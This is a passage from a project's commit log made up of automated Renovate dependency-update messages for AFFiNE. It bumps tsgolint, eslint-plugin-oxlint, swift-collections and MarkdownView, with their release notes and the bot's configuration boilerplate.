[@​renovate](https://redirect.github.com/renovate)\[bot] in [#​966](https://redirect.github.com/oxc-project/tsgolint/pull/966) - perf(no-unnecessary-type-parameters): stop counting settled candidates by [@​camc314](https://redirect.github.com/camc314) in [#​967](https://redirect.github.com/oxc-project/tsgolint/pull/967) - chore: add `dprint` to pnpm `allowBuilds` by [@​camc314](https://redirect.github.com/camc314) in [#​968](https://redirect.github.com/oxc-project/tsgolint/pull/968) **Full Changelog**: <https://github.com/oxc-project/tsgolint/compare/v0.22.1...v0.23.0> ### [`v0.22.1`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.22.1) [Compare Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.22.0...v0.22.1) #### What's Changed - fix: clarify `AGENTS.md` submodule guidance by [@​camc314](https://redirect.github.com/camc314) in [#​909](https://redirect.github.com/oxc-project/tsgolint/pull/909) - feat(no-unsafe-enum-comparison): implement suggestion by [@​camc314](https://redirect.github.com/camc314) in [#​910](https://redirect.github.com/oxc-project/tsgolint/pull/910) - feat(no-unnecessary-template-expression): implement fix by [@​camc314](https://redirect.github.com/camc314) in [#​911](https://redirect.github.com/oxc-project/tsgolint/pull/911) - chore(deps): update dependency vitest to v4.1.5 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​912](https://redirect.github.com/oxc-project/tsgolint/pull/912) - chore(deps): update github-actions by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​913](https://redirect.github.com/oxc-project/tsgolint/pull/913) - fix(prefer-optional-chain): avoid access comparison false positive by [@​camc314](https://redirect.github.com/camc314) in [#​914](https://redirect.github.com/oxc-project/tsgolint/pull/914) **Full Changelog**: <https://github.com/oxc-project/tsgolint/compare/v0.22.0...v0.22.1> ### [`v0.22.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.22.0) [Compare Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.21.1...v0.22.0) #### What's Changed - chore: convert renovate config to json by [@​Boshen](https://redirect.github.com/Boshen) in [#​893](https://redirect.github.com/oxc-project/tsgolint/pull/893) - chore: update typescript-go submodule by [@​camc314](https://redirect.github.com/camc314) in [#​895](https://redirect.github.com/oxc-project/tsgolint/pull/895) - ci: replace OXC\_BOT\_PAT with GitHub App tokens by [@​Boshen](https://redirect.github.com/Boshen) in [#​894](https://redirect.github.com/oxc-project/tsgolint/pull/894) - ci: add security analysis workflow by [@​Boshen](https://redirect.github.com/Boshen) in [#​898](https://redirect.github.com/oxc-project/tsgolint/pull/898) - chore(deps): update github-actions by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​899](https://redirect.github.com/oxc-project/tsgolint/pull/899) - chore(deps): update module github.com/dlclark/regexp2 to v1.12.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​900](https://redirect.github.com/oxc-project/tsgolint/pull/900) - chore(deps): update dependency typescript to v6.0.3 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​901](https://redirect.github.com/oxc-project/tsgolint/pull/901) - ci: make security analysis required-check friendly by [@​Boshen](https://redirect.github.com/Boshen) in [#​902](https://redirect.github.com/oxc-project/tsgolint/pull/902) - feat(require-await): implement suggestions by [@​younggglcy](https://redirect.github.com/younggglcy) in [#​896](https://redirect.github.com/oxc-project/tsgolint/pull/896) - fix: add warning for unsupported tsgolint CLI entrypoint by [@​camc314](https://redirect.github.com/camc314) in [#​903](https://redirect.github.com/oxc-project/tsgolint/pull/903) - fix: resolve ancestor tsconfig for excluded nearest config by [@​camc314](https://redirect.github.com/camc314) in [#​904](https://redirect.github.com/oxc-project/tsgolint/pull/904) - chore: update typescript-go submodule by [@​camc314](https://redirect.github.com/camc314) in [#​905](https://redirect.github.com/oxc-project/tsgolint/pull/905) - fix: handle UTF-16 diagnostics by [@​camc314](https://redirect.github.com/camc314) in [#​906](https://redirect.github.com/oxc-project/tsgolint/pull/906) - fix(no-useless-default-assignment): make default assignment removal a suggestion by [@​camc314](https://redirect.github.com/camc314) in [#​907](https://redirect.github.com/oxc-project/tsgolint/pull/907) - fix(no-unnecessary-type-arguments): preserve shadowed type arguments by [@​camc314](https://redirect.github.com/camc314) in [#​908](https://redirect.github.com/oxc-project/tsgolint/pull/908) **Full Changelog**: <https://github.com/oxc-project/tsgolint/compare/v0.21.1...v0.22.0> ### [`v0.21.1`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.21.1) [Compare Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.21.0...v0.21.1) ##### What's Changed - fix(no-unnecessary-condition): handle null overlap in narrowed generic intersections by [@​camc314](https://redirect.github.com/camc314) in [#​891](https://redirect.github.com/oxc-project/tsgolint/pull/891) - revert(no-unnecessary-type-arguments): drop inference reporting by [@​camc314](https://redirect.github.com/camc314) in [#​892](https://redirect.github.com/oxc-project/tsgolint/pull/892) **Full Changelog**: <https://github.com/oxc-project/tsgolint/compare/v0.21.0...v0.21.1> ### [`v0.21.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.21.0) [Compare Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.20.0...v0.21.0) ##### What's Changed - chore: migrate gen-json-schemas to TS by [@​camc314](https://redirect.github.com/camc314) in [#​874](https://redirect.github.com/oxc-project/tsgolint/pull/874) - chore: update typescript-go submodule by [@​camc314](https://redirect.github.com/camc314) in [#​879](https://redirect.github.com/oxc-project/tsgolint/pull/879) - chore(deps): update github-actions by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​883](https://redirect.github.com/oxc-project/tsgolint/pull/883) - chore(deps): update gomod by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​884](https://redirect.github.com/oxc-project/tsgolint/pull/884) - chore(deps): update npm packages by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​885](https://redirect.github.com/oxc-project/tsgolint/pull/885) - feat: improve `consistent-type-exports` diagnostics quality by [@​camchenry](https://redirect.github.com/camchenry) in [#​880](https://redirect.github.com/oxc-project/tsgolint/pull/880) - chore(deps): update softprops/action-gh-release action to v3 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​886](https://redirect.github.com/oxc-project/tsgolint/pull/886) - feat: enrich the `no-array-delete` diagnostic by [@​camchenry](https://redirect.github.com/camchenry) in [#​881](https://redirect.github.com/oxc-project/tsgolint/pull/881) - feat: enrich `no-duplicate-type-constituents` diagnostic by [@​camchenry](https://redirect.github.com/camchenry) in [#​882](https://redirect.github.com/oxc-project/tsgolint/pull/882) - fix(no-meaningless-void-operator): align with typescript-eslint union handling by [@​camc314](https://redirect.github.com/camc314) in [#​887](https://redirect.github.com/oxc-project/tsgolint/pull/887) - chore(deps): update crate-ci/typos action to v1.45.1 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​888](https://redirect.github.com/oxc-project/tsgolint/pull/888) - fix(no-deprecated): avoid false positive on array destructuring bindings by [@​camc314](https://redirect.github.com/camc314) in [#​890](https://redirect.github.com/oxc-project/tsgolint/pull/890) **Full Changelog**: <https://github.com/oxc-project/tsgolint/compare/v0.20.0...v0.21.0> ### [`v0.20.0`]() [Compare Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.19.0...v0.20.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
276b0db625 |
chore: bump up eslint-plugin-oxlint version to v1.66.0 (#15006)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.64.0` → `1.66.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.64.0/1.66.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.66.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.66.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.65.0...v1.66.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.65.0...v1.66.0) ### [`v1.65.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.65.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.64.0...v1.65.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.64.0...v1.65.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
bac346f304 | chore: bump up nestjs to v13.4.1 (#15002) | ||
|
|
3e42bbf4fa |
chore: bump up apple/swift-collections version to from: "1.5.1" (#15001)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | patch | `from: "1.5.0"` → `from: "1.5.1"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.5.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.1): Swift Collections 1.5.1 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.5.0...1.5.1) This is a patch release resolving three issues uncovered since 1.5.0 was tagged, including a source breaking regression introduced in 1.4.0, affecting clients importing the `Collections` module. #### What's Changed - Import error from `HashTreeCollections`, reported by [@​vanvoorden](https://redirect.github.com/vanvoorden) in [#​653](https://redirect.github.com/apple/swift-collections/issues/653) - Resolve source break in the Collections module by [@​lorentey](https://redirect.github.com/lorentey) in [#​654](https://redirect.github.com/apple/swift-collections/pull/654) - Linker error around RigidArray when using in Embedded Swift for WebAssembly, reported by [@​sliemeobn](https://redirect.github.com/sliemeobn) in [#​648](https://redirect.github.com/apple/swift-collections/issues/648) - \[BasicContainers] Don’t define LLDB formatter symbol on Wasm by [@​lorentey](https://redirect.github.com/lorentey) in [#​650](https://redirect.github.com/apple/swift-collections/pull/650) - Guard `UniqueBox.borrow` correctly by [@​FranzBusch](https://redirect.github.com/FranzBusch) in [#​649](https://redirect.github.com/apple/swift-collections/pull/649) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.5.0...1.5.1> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b5e5f0708a |
chore: bump up Lakr233/MarkdownView version to from: "3.9.1" (#14861)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView) | minor | `from: "3.8.2"` → `from: "3.9.1"` | --- ### Release Notes <details> <summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary> ### [`v3.9.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1) ### [`v3.9.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
661d5d3831 |
chore: bump up eslint-plugin-oxlint version to v1.64.0 (#14972)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.60.0` → `1.64.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.60.0/1.64.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.64.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.64.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.63.0...v1.64.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.63.0...v1.64.0) ### [`v1.63.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.63.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.62.0...v1.63.0) ##### 🐞 Bug Fixes - Ignore [@​typescript-eslint/consistent-type-imports](https://redirect.github.com/typescript-eslint/consistent-type-imports) for vue, astro, and svelte files - by [@​Sysix](https://redirect.github.com/Sysix) in [#​710](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/issues/710) [<samp>(e9eb2)</samp>](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/commit/e9eb236) ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.62.0...v1.63.0) ### [`v1.62.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.62.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.61.0...v1.62.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.61.0...v1.62.0) ### [`v1.61.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.61.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.60.0...v1.61.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.60.0...v1.61.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzkuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE3OS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
c39fa1ff2d |
chore: bump up apple/swift-collections version to from: "1.5.0" (#14969)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.4.1"` → `from: "1.5.0"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.5.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.0): Swift Collections 1.5.0 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.4.1...1.5.0) This feature release supports Swift toolchain versions 6.0, 6.1, 6.2, and 6.3. It includes the following new features and bug fixes: ##### Debugging enhancements The package now defines LLDB data formatters for `RigidArray`. The formatters are emitted into the executable binary, and they are automatically loaded by LLDB. We expect to implement formatters for (many) more types in subsequent releases. ##### New stable APIs - `RigidArray` and `UniqueArray` now conform to `Equatable` when their element type is `Equatable`. This conformance requires a Swift 6.4 or later toolchain (it relies on [SE-0499][SE-0499] generalizations of `Equatable`/`Hashable` to support noncopyable conforming types). - `RigidArray` and `UniqueArray` gained an `isTriviallyIdentical(to:)` operation, which reports whether two instances share their underlying storage allocation. This does not require the element type to be `Equatable`, and it works with noncopyable elements. - [`BitSet`][BitSet] gained a `makeIterator(from:)` shortcut for starting iteration at (or after) a specific member, avoiding a linear scan from the start of the set. - [`OrderedDictionary`][OrderedDictionary] gained a `replaceElement(at:withKey:value:)` operation that replaces the key-value pair at a given index. The new key is allowed to equal the existing key at that index (in which case only the value is updated). [BitSet]: https://swiftpackageindex.com/apple/swift-collections/documentation/bitcollections/bitset [OrderedDictionary]: https://swiftpackageindex.com/apple/swift-collections/documentation/orderedcollections/ordereddictionary [SE-0499]: https://redirect.github.com/swiftlang/swift-evolution/blob/main/proposals/0499-equatable-hashable-comparable-noncopyable.md ##### Experimental hashed containers (`UnstableHashedContainers` trait) The Robin-Hood-hashed `UniqueSet`, `RigidSet`, `UniqueDictionary`, and `RigidDictionary` types in the `BasicContainers` module continue to evolve behind the `UnstableHashedContainers` package trait. This release brings a number of correctness fixes and performance improvements: - Faster removals, with better `maxProbeLength` maintenance to avoid probe-length bloat. - Small tables are now scrambled to avoid degenerate patterns on common key distributions. - A fast-path shortcut for insertions into under-utilized tables. - Fixes to the insertion algorithm and to `RigidDictionary.updateValue(forKey:with:)` (the latter exhibited undefined behavior on removals). - `RigidSet.insert(maximumCount:from:)` no longer spuriously reports a capacity overflow due to incorrect accounting. - The `UnstableHashedContainers` trait can now be enabled independently of `UnstableContainersPreview`. These types remain source-unstable for now. ##### Experimental sorted collections (`UnstableSortedCollections` trait) The `SortedCollections` module's [`SortedSet`][SortedSet] has gained the following additions: - `SortedSet` now supports value-range subscripts for the full variety of standard range expression types, `ClosedRange`, `PartialRangeFrom`, `PartialRangeThrough`, and `PartialRangeUpTo`. - `SortedSet.firstIndex(after:)` and `SortedSet.lastIndex(before:)` return the index to the nearest member following or preceding a given value. This release also fixes several underlying B-tree bugs that were surfaced by these additions. These types remain source-unstable; they have known API deficiencies that will need to be addressed before they ship. [SortedSet]: https://redirect.github.com/apple/swift-collections/tree/main/Sources/SortedCollections/SortedSet ##### Experimental container protocols (`UnstableContainersPreview` trait) The `ContainersPreview` module's protocol hierarchy and associated types continue to be developed. Several constructs have been renamed to follow Swift Evolution proposals in flight. | Old name | New name | | ------------------------- | --------------------------- | | `struct Box<T>` | `struct UniqueBox<Value>` | | `struct Borrow<Target>` | `struct Ref<Target>` | | `struct Inout<Target>` | `struct MutableRef<Target>` | | `Producer.ProducerError` | `Producer.Failure` | | `Producer.generateNext()` | `Producer.next()` | | `Producer.skip(upTo:)` | `Producer.skip(by:)` | For `UniqueBox`, `Ref` and `MutableRef`, there are deprecated typealiases for the old names, preserving source compatibility. Other changes to the experimental container model: - `Container.Index` no longer needs to conform to `Comparable`. This allows linked lists to become containers. - `RigidArray`, `UniqueArray`, `RigidDeque`, and `UniqueDeque` now conform to the container protocols. - Added `Producer.collect(into:)` for collecting a producer's output into a `RangeReplaceableContainer`. - Added `BorrowingIteratorProtocol.copy()` for turning a borrowing iterator into a producer. - Added `filter` and `map` overloads for `BorrowingIteratorProtocol`, `Producer`, and `Drain`. - `BorrowingSequence.first` was removed. - `BorrowingSequence`, `BorrowingIteratorProtocol` and their requirements have temporarily gained trailing underscores to avoid naming conflicts with the (provisional) protocol definition in the Standard Library. We expect these definitions to be removed when these protocols officially become part of the stdlib. The protocol-based APIs in `ContainersPreview` now require a Swift 6.4 or later toolchain. `UniqueBox` is source-stable, therefore it continues to require Swift 6.2. ##### Notable bug fixes - `HashTreeCollections`: Fixed an invariant violation that could be triggered by some operations on `TreeSet`/`TreeDictionary`. - `_RopeModule`: Fixed an infinite loop when hashing the UTF-8 view of a multi-chunk big substring. - `BitCollections`: Fixed a bogus precondition in `BitArray.insert(repeating:count:at:)`; fixed `BitSet.isSubset(of: Range<Int>)` to correctly examine elements above the range's upper word. - `HeapModule`: Fixed `Heap.insert(contentsOf:)` to use a wrapping multiply in its Floyd-heuristic computation; added a missing bounds assertion in `Heap._UnsafeHandle.swapAt(_:with:)`. - `OrderedCollections`: Fixed `OrderedSet` crash on negative capacity values; minor fixes in `_HashTable.UnsafeHandle`. - `DequeModule`: Fixed sizing issue in `UniqueDeque.replace(removing:addingCount:initializingWith:)`; fixed a missing argument validation in `RigidDeque.nextMutableSpan(after:maximumCount:)`; `RigidDeque.consume(_:consumingWith:)` now closes the resulting gap before returning; added zero-count fast-paths; replace/prepend operations taking a `Collection` now verify that the source's count matches its contents. - `BasicContainers`: Fixed an overallocation issue in `UniqueArray.replace(removing:copying:)`; fixed a partial-initialization correctness issue in `RigidArray.replace(removing:consumingWith:addingCount:initializingWith:)`. #### What's Changed - Add tests that build the ContainersPreview module by [@​natecook1000](https://redirect.github.com/natecook1000) in [#​610](https://redirect.github.com/apple/swift-collections/pull/610) - Add a workflow that performs a CMake build by [@​natecook1000](https://redirect.github.com/natecook1000) in [#​612](https://redirect.github.com/apple/swift-collections/pull/612) - Align `BorrowingSequence` implementation with proposal by [@​natecook1000](https://redirect.github.com/natecook1000) in [#​609](https://redirect.github.com/apple/swift-collections/pull/609) - Bump swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml from 0.0.8 to 0.0.9 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​615](https://redirect.github.com/apple/swift-collections/pull/615) - Bump swiftlang/github-workflows/.github/workflows/soundness.yml from 0.0.8 to 0.0.9 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​614](https://redirect.github.com/apple/swift-collections/pull/614) - Fix lifetime requirements rigidly enforced in the latest nightlies by [@​lorentey](https://redirect.github.com/lorentey) in [#​617](https://redirect.github.com/apple/swift-collections/pull/617) - Track array proposal by [@​lorentey](https://redirect.github.com/lorentey) in [#​619](https://redirect.github.com/apple/swift-collections/pull/619) - Bump swiftlang/github-workflows/.github/workflows/soundness.yml from 0.0.9 to 0.0.10 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​620](https://redirect.github.com/apple/swift-collections/pull/620) - OrderedSet: Don't crash on negative capacity values by [@​thisismanan](https://redirect.github.com/thisismanan) in [#​622](https://redirect.github.com/apple/swift-collections/pull/622) - \[ContainersPreview] Don’t require `Container.Index` to conform to `Comparable` by [@​lorentey](https://redirect.github.com/lorentey) in [#​623](https://redirect.github.com/apple/swift-collections/pull/623) - Adjust experimental workflows by [@​lorentey](https://redirect.github.com/lorentey) in [#​626](https://redirect.github.com/apple/swift-collections/pull/626) - [BitSet] Add `BitSet.makeIterator(from:)` by [@​lorentey](https://redirect.github.com/lorentey) in [#​627](https://redirect.github.com/apple/swift-collections/pull/627) - \[BasicContainers] RigidSet.insert(maximumCount:from:): Fix spurious capacity overflow caused by incorrect accounting by [@​lorentey](https://redirect.github.com/lorentey) in [#​628](https://redirect.github.com/apple/swift-collections/pull/628) - \[BasicContainers] RigidArray.replace(removing:consumingWith:addingCount:initializingWith:): Fix correctness issue with partial initialization by [@​lorentey](https://redirect.github.com/lorentey) in [#​629](https://redirect.github.com/apple/swift-collections/pull/629) - \[BasicContainers] UniqueArray.replace(removing:copying): Fix overallocation issue by [@​lorentey](https://redirect.github.com/lorentey) in [#​630](https://redirect.github.com/apple/swift-collections/pull/630) - Fix \_trim(first:) returning wrong buffer region by [@​FranzBusch](https://redirect.github.com/FranzBusch) in [#​631](https://redirect.github.com/apple/swift-collections/pull/631) - Bump swiftlang/github-workflows/.github/workflows/soundness.yml from 0.0.10 to 0.0.11 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​625](https://redirect.github.com/apple/swift-collections/pull/625) - \[OrderedCollections] Add OrderedDictionary.replaceElement(at:withKey:… by [@​inju2403](https://redirect.github.com/inju2403) in [#​616](https://redirect.github.com/apple/swift-collections/pull/616) - \[ContainersPreview] Producer.ProducerError ⟹ Producer.Failure by [@​lorentey](https://redirect.github.com/lorentey) in [#​634](https://redirect.github.com/apple/swift-collections/pull/634) - fix: reserveCapacity DocC link in RigidArray by [@​manojmahapatra](https://redirect.github.com/manojmahapatra) in [#​633](https://redirect.github.com/apple/swift-collections/pull/633) - \[BasicContainers, DequeModule]: Assorted fixes by [@​lorentey](https://redirect.github.com/lorentey) in [#​632](https://redirect.github.com/apple/swift-collections/pull/632) - \[Debugging] Add lldb data formatter for RigidArray by [@​kastiglione](https://redirect.github.com/kastiglione) in [#​607](https://redirect.github.com/apple/swift-collections/pull/607) - \[HashTreeCollections] Fix invariant violation in \_HashNode.\_regularNode by [@​lorentey](https://redirect.github.com/lorentey) in [#​635](https://redirect.github.com/apple/swift-collections/pull/635) - \[BitCollections] Fix small issues by [@​lorentey](https://redirect.github.com/lorentey) in [#​637](https://redirect.github.com/apple/swift-collections/pull/637) - \[HeapModule, SortedCollections] Assorted tool-assisted fixes and adjustments by [@​lorentey](https://redirect.github.com/lorentey) in [#​639](https://redirect.github.com/apple/swift-collections/pull/639) - \[BasicContainers] Enable APIs scheduled to ship in 1.5.0 by [@​lorentey](https://redirect.github.com/lorentey) in [#​641](https://redirect.github.com/apple/swift-collections/pull/641) - \[BasicContainers] Fix copypasta in `UniqueArray.edit`’s docs by [@​lorentey](https://redirect.github.com/lorentey) in [#​642](https://redirect.github.com/apple/swift-collections/pull/642) - Rename `Box` to `UniqueBox`; align API surface with SE-0517 by [@​lorentey](https://redirect.github.com/lorentey) in [#​640](https://redirect.github.com/apple/swift-collections/pull/640) - Bump swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml from 0.0.9 to 0.0.11 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​624](https://redirect.github.com/apple/swift-collections/pull/624) - Use the defines from traits directly by [@​FranzBusch](https://redirect.github.com/FranzBusch) in [#​644](https://redirect.github.com/apple/swift-collections/pull/644) - \[ContainersPreview] `struct Borrow` ⟹ `struct Ref` by [@​lorentey](https://redirect.github.com/lorentey) in [#​643](https://redirect.github.com/apple/swift-collections/pull/643) - \[ContainersPreview] `struct Inout` ⟹ `struct MutableRef` by [@​lorentey](https://redirect.github.com/lorentey) in [#​646](https://redirect.github.com/apple/swift-collections/pull/646) - 1.5.0 release preparations by [@​lorentey](https://redirect.github.com/lorentey) in [#​647](https://redirect.github.com/apple/swift-collections/pull/647) #### New Contributors - [@​thisismanan](https://redirect.github.com/thisismanan) made their first contribution in [#​622](https://redirect.github.com/apple/swift-collections/pull/622) - [@​FranzBusch](https://redirect.github.com/FranzBusch) made their first contribution in [#​631](https://redirect.github.com/apple/swift-collections/pull/631) - [@​inju2403](https://redirect.github.com/inju2403) made their first contribution in [#​616](https://redirect.github.com/apple/swift-collections/pull/616) - [@​manojmahapatra](https://redirect.github.com/manojmahapatra) made their first contribution in [#​633](https://redirect.github.com/apple/swift-collections/pull/633) - [@​kastiglione](https://redirect.github.com/kastiglione) made their first contribution in [#​607](https://redirect.github.com/apple/swift-collections/pull/607) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.4.1...1.5.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please 